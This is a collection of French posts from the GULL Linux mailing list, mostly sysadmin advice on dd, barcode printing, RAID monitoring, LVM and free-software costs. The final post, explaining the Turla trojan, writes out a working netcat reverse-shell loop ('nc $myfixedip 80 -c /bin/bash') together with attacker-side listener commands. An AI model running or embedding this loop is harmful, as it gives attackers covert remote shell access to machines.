 Tél: (+41/0) 24 454 54 04  Fax:..54 00  |   /\   |/   /__/ /   /  \/
 http://www.f-hauri.ch   | \ __ / |   /   /__  /_  /_  /\
 email: fe...@f-hauri.ch  \  /   -
 Félix Hauri   -Informaticien consultant-   
 Tél: (+41/0) 24 454 54 04 - 079 703 15 36   -   http://www.f-hauri.ch
##  
 Ni PGP, ni cryptage:  Tant que mal maîtrisé et/ou mal installé ce sys-
 tème est entre inutile et dangereux. Attention! Il existe désormais des
 dispositions légales tendant à faire valoir à une signature électronique   
 le même poids qu'une signature manuscrite!
##

___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Securité: Linux comme moyen de se débarasser des viruses

[felix]

Bonjour,

J'ai posté sur http://security.stackexchange.com/, en réponse à la question

  ``Au secour, mon pc est infecté, que dois-je faire?''

http://security.stackexchange.com/questions/138606

une suggestion de migrer à Linux, tout en répondant aux 5 sous-questions:

 - Arrêter l'ordi
 - Le considérer comme ``dé-sécurisé''
 - Déconseiller de continuer de l'utiliser sans rien faire
 - Backuper les données en bootant sur une ``live''
 - Suspecter les autres outils tels que routeur, imprimante, etc...

Ma réponse à été prise pour un troll:
 Elle m'a raporté 48 point de réputation et présente un score de zéro (0)
 c'est à dire qu'elle à été upvotée 6x et downvotée 6x. ( 6x10 - 6x2 = 48 )

C'est pourquoi je vous invite à jetter un coup d'oeil à ce thread et,
selon votre point de vue, upvoter, editer et/ou commenter ma réponse.

Si cette requête est discutable, du point de vue ethique ou politique,
je n'ai pas posté cette réponse pour faire un troll, mais parce-que
je suis convaincu du bien-fondé de cette réponse.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] dd

[felix]

Re,

On Thu, Sep 22, 2016 at 10:12:03AM +0200, Pierre Maitre wrote:
> Test en lecture du ssd:  386 M/s
> Test en écriture sur le hd: 1.25M/s
Wow!

> Note: j'ai utilisé pv pour les tests, ça me donne directement la
> vitesse de transfert.
dd te donne aussi des stats en fin d'execution du type:

2048000+0 enregistrements lus
2048000+0 enregistrements écrits
1048576000 octets (1.0 GB) copiés, 0.774663 s, 1.4 GB/s

> Conclusion: je vais acheter deux disques ssd identiques à ceux que je
> veux copier, ce sera plus simple.
Pkoi SSD!

Je mettrai ton HD en cause, mais pas de besoin qu'ils soient identiques.

> Cela dit, un test sur le SMART du hd ne me donne aucune erreur. Curieux.
Plutôt!

Testes ce disque, en SATA, sur une autre machine, et si tu obtiens les
même résultats, alors postes la sortie de ``smartctl -a /dev/...'' ici.
(C'est lourd, mais au regard de l'ensemble de la liste, c'est pas grand'chose)

Cela dit, je doute que ce disque soit encore réellement ``utilisable''.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] {Content?} Etiquette codebarre

[felix]

Dominique-Georges,

What's up?

As-tu pu imprimer tes codes barre correctement sur ta Brother QL-1060N?

Sinon, je peux faire pire, en utilisant ``LaTeX'' et ``pst-barcode''


On Mon, Sep 05, 2016 at 03:24:02PM +0200, felix wrote:
> ... ce script sera plus efficace et mieux adapté.


-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] {Content?} Etiquette codebarre

[felix]

... Mon dernier post contient un buggue. Vu la nature du .ps généré par
barcode, ce script sera plus efficace et mieux adapté.

On Mon, Sep 05, 2016 at 11:29:35AM +0200, felix wrote:
> C'est plus du Postscript que du Bash...

Voire du bash qui edite du postscript...

#!/bin/bash
# Ce script utilise des bashismes qui nécessitent une version 4.3 de bash

code=$1 string="$2"
pstextfmt='%%!\n/Helvetica findfont 12 scalefont setfont'
pstextfmt+=' newpath %f %f moveto (%s) show\n'

while IFS=:\  read cmd v1 v2 v3 v4 foo; do
[ "$cmd" = "%%HiResBoundingBox" ] && read cwidth < <(bc -l <<<"$v3-$v1")
[ "$cmd" = "%%BoundingBox" ] && ytop=$((v4+4)) xwidth=$v3
done < <(
gs -q -dNOPAUSE -dSAFER -sDEVICE=bbox <(
barcode -b "$code" -E -g 150x50
) -c quit 2>&1 )

read xtop < <(
gs -q -sDEVICE=bbox -dNOPAUSE <(
printf "${pstextfmt}showpage\n" 0 0 "$string"
) -c quit 2>&1 |
sed -ne 's/^..Hi.*Box: \+[0-9.]\+ \+[0-9.]\+ \+\([0-9.]\+\) .*$/('"\
$cwidth"'-\1)\/2+10/p' |
bc -l )

while IFS= read line ; do
   [ "$line" ] && [ -z "${lineBoundingBox*}" ] && 
line="${line%% *} 0 0 $xwidth $[ytop+12]"
   echo "$line"
   [ "$line" ] && [ -z "${line##*fontsize}" ] &&
printf "[(%s)  %f %d 12]\n" "$string" $xtop $ytop
done < <( barcode -b "$code" -E -g 150x50 )


-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] {Content?} Etiquette codebarre

[felix]

Bonjour,

C'est plus du Postscript que du Bash...

On Sun, Sep 04, 2016 at 09:00:59PM +0200, Dominique-Georges Branciard wrote:
> 
> Un vieux problème.
A rafraichir...

> je cherche a envoyer un fichier postscript qui contient une première 
> ligne (Nom d'un jeux) et la deuxieme ligne un code barre. sur une 
> imprimante Brother QL-1060N

Tu peux essayer:

  {
pstextfmt='%%!\n/Helvetica findfont\n12 scalefont\nsetfont\n'
pstextfmt+='newpath\n10 68 moveto\n(%s) show\n'
printf "$pstextfmt" 'VELASQUEZ Juliana'
barcode -b "21160902173756" -E -g 150x50
  } >barcode.ps

voire

  gs -sDEVICE=epswrite -sOutputFile=barcode.ps <(
pstextfmt='%%!\n/Helvetica findfont\n12 scalefont\nsetfont\n'
pstextfmt+='newpath\n10 68 moveto\n(%s) show\n'
printf "$pstextfmt" 'VELASQUEZ Juliana'
barcode -b "21160902173756" -E -g 150x50
  ) -c quit

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Où trouver Virus Informatique en Suisse... (Was: Re: Le Virus Info en Suisse)

[felix]

Wow merci!

Je rapporte immédiatement:

 ``Où trouver le magazine "Virus Informatique":''

http://www.acbm.com/virus/733_Ou_trouver_Le_Virus_Informatique_en_Suisse_.html

Merci Naville!

On Tue, Jun 28, 2016 at 08:43:59PM +0200, Olivier Aichelbaum wrote:
> Bonjour,
> On a enfin la liste :
> http://www.acbm.com/virus/733_Ou_trouver_Le_Virus_Informatique_en_Suisse_.html
> En esperant que ca pourra vous aider.
> A+
> Olivier
> 

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] virtualisation d'une machine physique

[felix]

On Wed, Apr 06, 2016 at 01:48:24PM +0200, Yann Lehmann wrote:

> Il tourne sous VMWare ESXi 6.0 (oui je sais, pas libre)
Hmmm.

> 1) nouvelle installation de Linux dans la VM, puis transfert des données
Voire LXC

> 2) copie des disques/partitions ('dd') vers machine virtuelle
Pour du non Linux

> 3) utilitaire p2v de VMWare, (Windows) pas prendre Linux RAID matériel
No comment.

> J'aurais deux questions dans l'optique de cette virtualisation:

> 1) quelqu'un saurait-il me recommander l'une ou l'autre des 3 méthodes
> ci-dessus (ou une alternative) ?
Moi ;-)

> 2) LVM fait-il sens dans une machine virtuelle?
Hmmm. Non sauf dépendances de machine pré-installée.
D'autant que pour vitualiser Linux, si tu utilises LXC, tu n'as
(par défaut) pas accès aux disques physiques!

Voilà, mon point de vue:

Linux (Debian voire Ubuntu server) sur la machine physique!!

  - Raid MD du kernel Linux pour éviter de dépendre du matériel
  - LVM semble incontournable dans le HN (Hardware Node)
  - Containers LXC pour les machines Linux (à copier avec tar)
  - Partitions LVM et KVM pour les machine non Linux (dd).

La mise en oeuvre nécessite pas mal d'adaptations, mais de nombreux
outils permettent de déménager du Windows, de VMWare à KVM...
(http://google.com/search?q=migration+vmware+to+kvm)

C'est du boulot, mais si tu en as le temps, ce sera bcp plus léger,
à terme!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Nouvel appel kernel: ``leftpad'' va être ajouter au kernel Linux

[felix]

Bonjour

Voici un nouvelle intéressante:

Pour faire suite au chaos et afin d'éviter qu'il ne se reproduise:

http://www.theregister.co.uk/2016/03/23/npm_left_pad_chaos/

Les développeurs du Kernel ont décider d'intégrer ``leftpad'' au
kernel afin de créer un nouvel appel système (nécessaire et attendu!)

Voire le bulletin sur LKML:
https://lkml.org/lkml/2016/3/31/1108

Dans l'attente, les impatients pourront utiliser une api web
mise à disposition pour combler le vide:

http://left-pad.io/

Exemple d'application:

https://api.left-pad.io/?str=Linux%20GULL=40=%20

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Truc et astuces: check mdstat

[felix]

Voilà, il s'agit d'un cas particulier où la machine de backup (un nas
raid iomega hacké) est incapable d'envoyer un mail.

Du coup, le serveur qui à un accès ssh à la machine de backup peut:

ssh backup cat /proc/mdstat

ou

for shell in {"ssh backup ",}/bin/bash;do
$shell <<<'sed "s/^/$HOSTNAME:\ /" /proc/mdstat'
done

Qui répond qqch comme:

backup: Personalities : [raid1] 
backup: md1 : active raid1 sdb2[0] sda2[1]
backup:   3274597760 blocks [2/2] [UU]
backup:   
backup: md0 : active raid1 sdb1[0] sda1[2]
backup:   204608 blocks super 1.2 [2/2] [UU]
backup:   
backup: unused devices: 
server: Personalities : [raid1]
server: md0 : active raid1 sda1[0] sda2[1]
server:   2374556480 blocks [2/2] [UU]
server:   
server: unused devices: 

(Lorsque tous les disques sont présent, je dois lire 3x `UU`)

Voici donc un petit (8 lignes) script à executer périodiquement, pour
envoyer un mail en cas de problème:

#!/bin/bash
TO=ad...@exemple.ch
SUBJECT="MDStat survey alert"

BODY=$(for shell in {"ssh backup ",}/bin/bash;do
   $shell <<<'sed "s/^/$HOSTNAME:\ /" /proc/mdstat'
   done)

[ -z "$BODY" ] || [ -n "${BODY//*UU*UU*UU*}" ] &&
mail -s "$SUBJECT" $TO <<<"${BODY:-No mdstat files.}"

J'utilise /bin/bash pour assurer que la variable HOSTNAME soit renseignée.

Si `$BODY` est vide ou s'il contient moins de 3x `UU`, j'envoie un mail
contenant les deux mdstats ou un message indiquant un problème

(nb: je n'aime pas les regex en bash: lourd et syntaxe pas claire)

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] déplacer sa session bash

[felix]

J'arrive un peu tard?!

On Thu, Feb 25, 2016 at 06:50:50PM +0100, Daniel Cordey wrote:
> On 24. 02. 16 23:48, Cédric BRINER wrote:
> 
> >Ouais pas de moquerie, surtout quand on apprend qu'Ubuntu va délivrer un
> >zfs.ko.
> 
> T'es pas obligé d'utiliser :-)

:->>

> >As-tu bien lu ma question.
> >Tu verrais que j'ai  place dans la ligne du ssh d'invoquer /usr/bin/bash
> >au lieu du tcsh.
> 
> Oui, mais... ssh lance un tcsh !!! qui interprète la libe
> "/usr/bin/bash...". Ce qui fait que tcsh va t'interpréter toute ta ligne
> avant l'exécution du bash. Voilà pourquoi...

Voilà, voilà:_Je suis d'accord avec Daniel, comme le profile fait que
tcsh est lancé pas sshd, alors pour tester en local, taper:

  tcsh <<<'/bin/bash -c "Ma commande"'

Peut donner une idée...

Je voulais te proposer d'essayer:

ssh root@disthost /bin/bash < <(declare -f myscript)

De sorte que ta *ligne de commande* soit légère, ne contenant
pas de guillemets ni autre truc délicats et que le script
soit lû par bash, en stdin (normal, quoi.)


--__
 Félix Hauri -  Informaticien consultant  -  http://f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Commande pour supprimer un espace final dans des noms de dossiers

[felix]

Bonjour,

On Wed, Feb 10, 2016 at 10:47:31AM +0100, Samuel Chenal wrote:
> Le but était de trouver une commande pour virer ce dernier caractère. La
> commande :
> 
> find . -type d -iname "* "
> 
> ... m'a donné plusieurs centaines de dossiers dans ce cas.

:-))

> J'ai construit la commande suivante :
> 
> find . -type d -iname "* " -exec rename -v 's/\ $//g' {} \;
> 
> ... qui semble bien fonctionner. Il faut cependant la lancer plusieurs fois.
> 
> En effet, j'ai l'impression que le find s'exécute pour toute
> l'arborescence et ensuite, il lance le -exec. Et comme certains dossiers
> sont modifiés par le rename, le -exec ne peut plus accéder aux
> sous-dossiers fautifs pour les renommer.

C'est juste!

Le truc c'est que find te présente l'arborescence de la manière suivante:

  /
  /aaa/
  /aaa/bbb
  /aaa/ccc
  /aaa/ddd/
  /aaa/ddd/eee

Et donc, par ordre, su tu renomme ddd avant de renommer eee, la
commande ne trouvera plus eee, puisqu'il n'est plus sous ddd que
tu as déjà renommé.

En fait, je pense que ``tac'' devrait le faire

genre:


  find ... -print | tac | tr \\n \\0 | xargs -0 rename 's/ $//' 

A paufiner, tester!

Bonne chance!

( Sinon: flèche vers le haut + return, tant que ça dure ;-) 

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Commande pour supprimer un espace final dans des noms de dossiers

[felix]

Bonjour,

On Wed, Feb 10, 2016 at 07:34:55PM +0100, Cyril Rouiller wrote:

> Oui, sauf que ``man find`` nous indique l'option ``-dept`` qui permet
> justement de traiter le contenu d'un répertoire avant d'agir sur le
> répertoire en lui-même.
> 
> C'est une option vraiment très très intéressante!
> 
> >> "-depth Process each directory's contents before the directory
> >> itself. The -delete action also implies -depth."
Juste!

Ce switch m'est sorti de la tête (car trop rarement pratiqué)

Bravo Cyril et merci!


> Maintenant, dommage que le man d'une commande si utile et utilisée ne
> soit pas en français... Je n'ai malheureusement pas les compétences
> pour la traduire.
Je pense que si tu as les compétences pour la lire et la comprendre *et*
que tu est compétant pour rédiger en frencè, alors tu peux te lancer...
... si tu en as le courrage et le temps!

Si ton travail est corrigé, il aurra au moins servi de point de départ.

(Je n'avais même pas relevé que cette page est encore et toujours en
 francais... Elle a probablement été traduite par le passé mais la commande
 à évolué de trop pour conserver une traduction interrompue.)


-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Write Amplification on SSD

[felix]

Bonjour,

Lors de la présentation Proxmox, si j'ai bien entendu, Daniel parlait
d'éviter les écriture ``excessives'' en SSD...

Le phénomène est nommé: ``Write amplification'', une explication bien
``prise de tête'' est disponible sur wikipedia:

  https://en.wikipedia.org/wiki/Write_amplification

En gros, lorsque les écriture commencent à demander plus de temps,
il est l'heure de jetter votre SSD et le remplacer par un neuf!

A+!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Write Amplification on SSD

[felix]

On Tue, Feb 09, 2016 at 02:37:22PM +0100, Michael Parchet wrote:
> Bonjour,
> 
> Pourquoi changer un SSD s'il va plus lentement ?
> 

Parce que s'il va plus lentement, c'est qu'il passe plus de temps à chercher
des ``cellules'' utilisable.

C'est le début des ``Reallocated_Sectors'', c'est donc le début de la fin!

Le truc, c'est que quand la fin arrive, elle arrive vite (brutalement)!

Petite command qui *doit* répondre ``0'' (adaptez "sda" à votre config)
Si elle ne répond rien, merci de me faire parvenir le résultat de la commande
``smartctl -a '' par courier privé.

# sed 's/^.*[Rr]ealloc.*\([sS]ector\|[bB]locks\).* \([0-9]\+\) *$/\2/p;d' <(
smartctl -a /dev/sda)
0

(ouf!)

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] [gull-annonces] Assemblée générale

[felix]

On Sat, Jan 30, 2016 at 05:50:57PM +0100, Cédric BRINER wrote:
> ... pour l'assemblée générale. Elle aura lieu (si tout va bien)
> le 5 avril 2015.

C'est donc un mardi!? Je vais le noter de suite!

> Si l'annonce est faite aussi tôt, c'est pour que vous puissiez
> vous organiser au mieux.

Bien vu! Je vais donc le noter de suite!

> Au plaisir de vous voir nombreux.

Sauf impondérable (invasion de sauterelles, sècheresse, explosion
volcanique), je serai là!

A+!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] MemStick USB Cassé

[felix]

Re,

On Sat, Jan 30, 2016 at 05:10:20PM +0100, Cédric BRINER wrote:
> FixME est peut-être la solution ??
Oui, j'ai bien pensé, c'est d'ailleur ce que j'ai fait, mais sur place.

Avec un electronicien doté d'une vue excellente, j'ai scié le boitier
du stick usb, cassé le connecteur d'origine, coupé et soudé un bout de 
câble USB et là Linux à vu une ``Mass storage''...

... Malheureusement sans disk, comme un lecteur CD sans galette (le
"kern.log" parle d'un disque ``sdd'' mais rien dans "/proc/partitions"
et une tentative de lecture dit: ``Aucun medium trouvé'', comme un
lecteur DVD vide.

A ce moment, juste avant de jetter l'éponge, mon ami regarde avec une
très grande attention, les deux chips qui sont sur la carte: driver
usb et mémoire. Il arrive a repérer une pin qui a dû être tordue par
le coup de genou, à travers le boitier, la dé-tord, l'appuie sur le
board et très délicatement on rebranche: Bingo!

J'arrive à relire le stick, mais à 1Mb/s! Alors pour assurer le transfert
des 8Gb et limitant les risque de surchauffe, nous avons placé un ventilo
pour refroidir le stick, durant la copie ``dd conv=noerror,sync''.

Bref, nous ne sommes pas peu fier de cet exploit. Je vais faire des
photos du travail et produire un article pour le raconter!

Merci pour vos réponses et encouragements.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Le coût réel du logiciel libre par rapport au propriétaire

[felix]

Je ne suis pas tout-à-fait d'accord avec les dessin:

En fait, l'adoption de logiciels libres coute très cher:

  Il faut:
   - renoncer à 20 ans d'expérience avec des outils que l'on connait et
 qui nous ont déjà posé bcp de problèmes (pas envie de recommencer)
   - apprendre TOUT sur une série d'outils qui sont tout sauf accueillants.
   - révolutionner la structure du parc informatique et du réseau interne

Chercher à masquer ses coût en "vendant du libre" est une erreur!

Mais comme il s'agit d'investissement, c'est durable! (les logiciels libres
ne changent pas leur skin juste pour changer de numéro de version et vendre
une mise à jour)

C'est donc un coût important mais dégressif très rapidement et très
nettement inférieur aux coût de logiciels propriétaires (buggués),
sur le long terme.

Il faut se dire qu'une entreprise moyenne devra investir beaucoup durant
la première année de transition.

Après, lorsque les compétances sont acquises et que la machine tourne,
alors mises-à-jour, maintenance, exploitation deviennent nettement plus
léger. L'utilisation égallement devient plus naturelle.

En fait on doit pouvoir dessiner une sorte de X, avec le cout du libre
au moins 2 fois supérieurs à ceux de Window les premières semaines,
puis une égalité des couts au bout d'une année (environ) et enfin 
une inversion du rapport avec Windows qui devient 2x plus cher que
le libre dès la fin de la 2ème année (en gros).

Pour dire que je reste persuadé que de continuer a utiliser Windows coûte
très nettement moins cher que de passer à Linux (au début)!!

Maintenant, si moi je tentais de passer à Windows maintenant, le graphique
serait marrant: Je paierai 100x plus cher la première année, puis 60x
la seconde année, puis 50x la troisième et les suivantes, mais jamais
windows ne pourra devenir mois cher que ce que j'utilise à présent.

L'utilisation d'Office Libre (openoffice ou libreoffice) est par contre
particulière:

 - Office Libre est plus complet et plus performant que celui de M$
 - Moins cher
 - Meilleures compatibilité multi-plateforme
 - Fonctionne sous Windows, donc pas besoin d'installer Linux

Le passage à un Office Libre peut se faire indépendament d'une migration
des structures réseau vers des solutions libres.



On Mon, Feb 01, 2016 at 08:31:31PM +0100, Michael Parchet wrote:
> Bonjour,
> 
> Merci pour le message sur la déclaration de berne et le logiciel libre.
> 
> Je voudrais vous faire partager ce lien qui (a mon avis) résume assez bien
> les coût réels du logiciels libre par rapport au logiciel propriétaire
> 
> http://www.befox.fr/content/les-logiciels-libres
> 
> En espérant que ça vous intéressera, je vous adresse mes meilleures
> salutation
> 
> mparchet
> ___
> gull mailing list
> gull@forum.linux-gull.ch
> http://forum.linux-gull.ch/mailman/listinfo/gull

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Déclaration de Berne

[felix]

Mon point de vue,

On Mon, Feb 01, 2016 at 07:56:11PM +0100, Guyot wrote:
>...
> la réponse fut la suivante :
> 
> 
> "Concernant les logiciels libres que vous évoquez dans votre message,
> ils présentent certes l'avantages d'être disponibles "gratuitement" sur
> le marché et de suivre à une logique non commerciale, mais
> malheureusement ils ne répondent que dans des cas très spécifiques à
> nos besoins.

On ressent l'idée que parce que c'est gratuit, c'est moins performant.
En fait, cette affirmation relève d'un manque d'expérience et d'une
carrence en motivation.

En effet les logiciels libres sont très étoffés, la pluparts des possibilité
existent, mais pas forcement ``de la même manière qu'avant''. De plus si
des ``cas spécifiques'' nécessitent des outils particuliers, les sources
étant ouvertes, le développement d'une feature particulière peut facilement
faire l'objet d'une commande externe et ponctuelle.

> Leur principal désavantage, c'est qu'ils nécessitent des connaissances
> pointues
Oui, voir mon mail concerant ``l'investissement'' en compétences logiciels

> en informatique
Non, les informaticiens que ne sont pas capable de produire des Certificats
obtenus sur la base de QCM ne sont pas des informaticient. Ne pas confondre!
Sinon, même remarque à propos des investissements.

> et qu'ils présentent de nombreux problèmes de compatibilité.
Faux!!!

Les logiciels libres sont compatible! Il sont le point de raliement des
commercieaux "concurentiels" qui tordent les protocoles standards.

> Comme vous le signalez, nous adhérons certes aux valeurs
> du libre pour un usage privé, mais pour un usage professionnel, ce
> n'est pas une solution optimale
On ne peut pas recommander au personnel d'utiliser un logiciel à la
maison et un autre au travail!

Il seront plus efficaces s'il n'en aprennent qu'un seul, à plus forte
raison s'il est efficace.

> à moins de disposer en interne de connaissances avancées
> de ces interfaces.
Ces compétances sont à créer un interne. Les carence en compétance
informatique sont reconnue sur l'ensemble de la planète!
(Merci à Microsoft qui à offert les formation et les licenses aux écoles)

> De plus, la très grande majorité de nos quelque 40 collaborateurs ne
> maîtrisent pas ces environnements. Leur utilisation serait ainsi trop
> chronophage et, par conséquence, également très onéreuse pour nous.
Ça, je peux comprendre, mais c'est à relativiser avec mes précédents
propos. La première année seulement, mais la première année vraiement!

> En outre, nous travaillons avec des fournisseurs (graphistes,
> imprimeurs) qui utilisent les outils professionnels usuels.
Pas grâve, personne n'est parfait!


> Finalement, en tant qu'organisation à but non lucratif, nous sommes
> certifiés Zewo et nous bénéficions à ce titre de rabais très
> significatifs sur les licences pour les logiciels utilisés.

Forcement: comme pour les écoles, il ne faudrait pas que les petits
tirent la société hors de l'égémonie de Microsoft!

> Autant de raisons qui font que nous avons choisi de ne pas travailler
> avec des logiciels libres, sauf dans des cas particuliers liés à
> notre travail d'enquête.

Ce sont des raisons juste, mais fabriquées par des intérêts commerciaux.
Choisir de s'en débarrasser est courageux, mais pas impossible!

> J'espère vous comprendrez les raisons de notre choix."

Je le comprend, mais n'y adhère pas!

> Une magnifique réponse, que je n'ai pas résisté à partager avec vous.

Tu peux faire suivre, si tu veux, mais je doute que ce soit très utile.

J'espère par contre vous donner des argument pour vos prochaines
discutions tumultueuses à ce propos.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Problème de connexion internet avec Mint 17.3

[felix]

Bonjour,

On Mon, Dec 21, 2015 at 09:42:31AM +0100, Claude Fuhrer wrote:
> Bonjour,
> 
> j'ai installé hier une machine avec une Linux Mint 17.3 (HP Envy/phoenix).
...
> connexion internet fonctionne pendant quelques minutes puis tombe...
> Pour la remettre en marche il suffit d'un "service network-manager
> restart", mais ce redémarrage n'est jamais de longue durée.
...
> Je comprends que ma question est très imprécise...

 - Connection Wifi ou Ethernet?
 - Install Mint basique, avec un seul user?
 - Connection Internet domestique ou pro? provider? Autres ordis?
 - As-tu installé des service réseau supplémentaires à l'install de base?
   (OpenVPN, par exemple)

Quelque pistes:

 - Voir /var/log/messages, /var/log/syslog et /var/log/kern.log
 - le contenu de /etc/resolv.conf (pinguer les nameservers)


-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] openssl maintenir deux certificats CA_Root temporairement

[felix]

On Mon, Nov 02, 2015 at 04:09:25PM +, TISSOT Jacques wrote:
> ... certains serveurs obtiennent leur certificat 
> d'une autorité A (caduque mais encore existante) et d'autres serveurs 
> d'une autorité B (la nouvelle mise en place)...

> ... serveurs Linux (Debian)... coexister les deux certificats
> que les requêtes Zenoss ldap_check puissent utiliser l'un ou l'autre 
...

Oui, dans Apache-2 tu peux très bien configurer 2 ``virtual hosts'',
(machine1.modomaine.ici, machine2,.mondomaine.ici) que tu fais pointer
sur la même IP (machine physique), utilisant chacun sa pair de clef
ssl.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Installation Linux sans table de partition

[felix]

Bonjour,

Désolé de faire le pénible...

On Mon, Oct 19, 2015 at 09:27:41AM +0200, Yves Martin wrote:
> 
> ... étendre à chaud une partition existante (machine virtuelle en LVM),
LVM ne fait pas de ``virtualisation''!

De quoi parles-tu? (chroot, lxc, openvz, kvm, vmware, autre?)

> c'est-à-dire que je suis obligé de rebooter: 

rebooter quoi? Le ``HN'' (hardware node ou machine physique) ou
 le ``CT'' (container ou machine virtuelle)?

> Visiblement dès que "/" est chargé depuis une partition "PC" (même sur LVM)...
??

La, je ne comprend pas... qu'est-ce qui est partitionné?


 la mise à jour de cette partition pour une nouvelle taille, plus grande, par 
"partprobe" n'a pas d'effet.
> 
> Je tente actuellement en labo une installation de Debian Jessie 8.2 sans 
> table de partition.
... Dans un container?

> En mode expert, je suis passé en console pour faire les opérations suivantes:

HN ou CT?

> pvcreate /dev/sda

... Et donc, c'est sda qui n'est pas partitionné!?

mais sda vu d'un container KVM ou VMWare ou dans le HN?

> vgcreate -s 16M vg01 /dev/sda
> lvcreate -L 512M -n swap vg01
> lvcreate -L 512M -n root vg01
> lvcreate -L 512M -n home vg01
> 
> Après redétection du disque, j'ai associé les systèmes de fichiers et
> les points de montage. L'installation se poursuit, jusqu'à l'échec 
> d'installation de Grub2.
Hum...

> ...
> grub-installer: grub-install: error: disk `lvmid/Uo../cwS..` not 
> found.
> grub-installer: error: Running 'grub-install --force "dev/sda"' failed.
Hem, je doute que grub puisse s'installer dans une partition LVM car ses
méta données sont placées dès le premier block.

> J'ai vu que Grub2 peut s'installer sur un disque directement formaté en ext
> (genre mkfs.ext4 /dev/sda) mais je ne trouve aucune référence dans le cas 
> d'un PV LVM sur /dev/sda.

> Me faut-il mettre en oeuvre un "faux RAID" avec "mdadm" pour réaliser une 
> installation sans table de partition ?
Non, si tu mets du LVM dans du raid, tu placera le même premier block dans ton 
sda.

> Ou me déconseillez-vous simplement de me lancer là-dedans, sachant bien que 
> c'est pour améliorer en confort en production ?
Non, plus, mais
 - partitionne ton `sda` avec parted (en gfs, si >2T),
 - prévois une mini partition `grub-boot` (voir toggle flags)
 - créé une partition pour LVM.



-- 
 Félix Hauri  -    -  http://www.f-hauri.ch

___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Recherche de conférencier sur Genève

[felix]

On Tue, Oct 06, 2015 at 11:11:33PM +0200, Cédric BRINER wrote:

> Les sujets sympa:
>  - Proxmox, Ganeti
>  - Logstash/elasticsearch
>  - xdg-app
>  - systemd
>  - owncloud chez soi
>  - Fedora/Mint/Ubuntu facile
>  - bash
>  - CoreOS/Rocket/Docker
>  - flask/django/pyjama/turbogears
>  - drupal...
>  - git

On m'avait demandé SSH (quelques options peut usitées et tellement utiles,
comme -L (et -R), -M (et -S), -o (HostKeyAlias, IdentitiesOnly, ProxyCommand)
et d'autres, qu'il m'arrive d'utiliser, parfois... ou pas.

Mais, je peux aussi parler de BASH et/ou SHELL...

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Trojan Turla for Linux

[felix]

*** Liste Linux Léman ***

On Tue, Dec 16, 2014 at 12:18:42PM +0100, Daniel Cordey wrote:
 
 http://www.linuxinsider.com/story/Turla-Trojan-Unearthed-on-Linux-81460.html
 

Sans chercher à affoler tous le monde...

On peut le démontrer le principe en bash:

Soit le trojan:

  $ while :;do netstat -n | grep -q $myfixedip:22 
nc $myfixedip 80 -c /bin/bash ; done

et depuis $myfixedip, le pirate utilisera, pour se connecter:

  dans une console:
  $ nc -l -p 80

  et dans une autre:
  $ nc -w 3 $targethost 22

 Le trojan est ``indétectable'' en ce sens que
 - il n'a pas de port ouvert en listen.
